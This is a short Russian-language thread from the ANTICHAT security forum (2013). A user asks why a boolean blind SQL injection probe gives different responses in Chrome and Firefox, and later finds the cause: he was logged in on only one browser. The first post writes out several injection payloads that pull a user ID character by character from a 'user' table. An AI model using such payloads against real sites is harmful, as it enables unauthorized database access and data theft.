HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.08.2013, 16:37
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Доброго!

Может, кто кратко даст наводку в чем разница между запросом в chrome и firefox. При выполнении запроса в chrome вида site/?id=+and+find_in_set(substring((SELECT+userid+FROM +user+limit+0,1),1,1),'1,d,2,3,4,5,6,7,8,9,a,b,c,d ,e,f')--+ выдает актуальную страницу без ошибок и редиректов, меняя шаблон site/?id=+and+find_in_set(substring((SELECT+userid+FROM +user+limit+0,1),1,1),'т,d,2,3,4,5,6,7,8,9,a,b,c, d,e,f')--+ заведомо убирая оттуда соответствие условию происходит редирект(условие для реализации blind). Ежели точно такой же запрос отправить в FF, то в любом случае выдает валидную страницу. Те даже если сделать site/?id=+and+find_in_set(substring((SELECT+userid+FROM +user+limit+0,1),1,1),'и,d,2,3,4,5,6,7,8,9,a,b,c, d,e,f')--+ зная точно заранее что userid=1, все равно выдает валидную страницу, хотя в шаблоне 1 отсутствует.

Конкретнее - необходимо через php curl снять разные состояния.

P.S. Заранее благодарен!
 
Ответить с цитированием

  #2  
Старый 16.08.2013, 22:18
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Вопрос закрыт, решение найдено
 
Ответить с цитированием

  #3  
Старый 17.08.2013, 13:26
FlIpS
Guest
Сообщений: n/a
Провел на форуме:
2290

Репутация: 0
По умолчанию

Если вопрос закрыт и решение найдено,выкладывай и сюда,мне тоже интересен этот вопрос.
 
Ответить с цитированием

  #4  
Старый 26.08.2013, 12:25
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Решение в невнимательности. Просто в одном браузере был авторизован, а в другом - нет.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ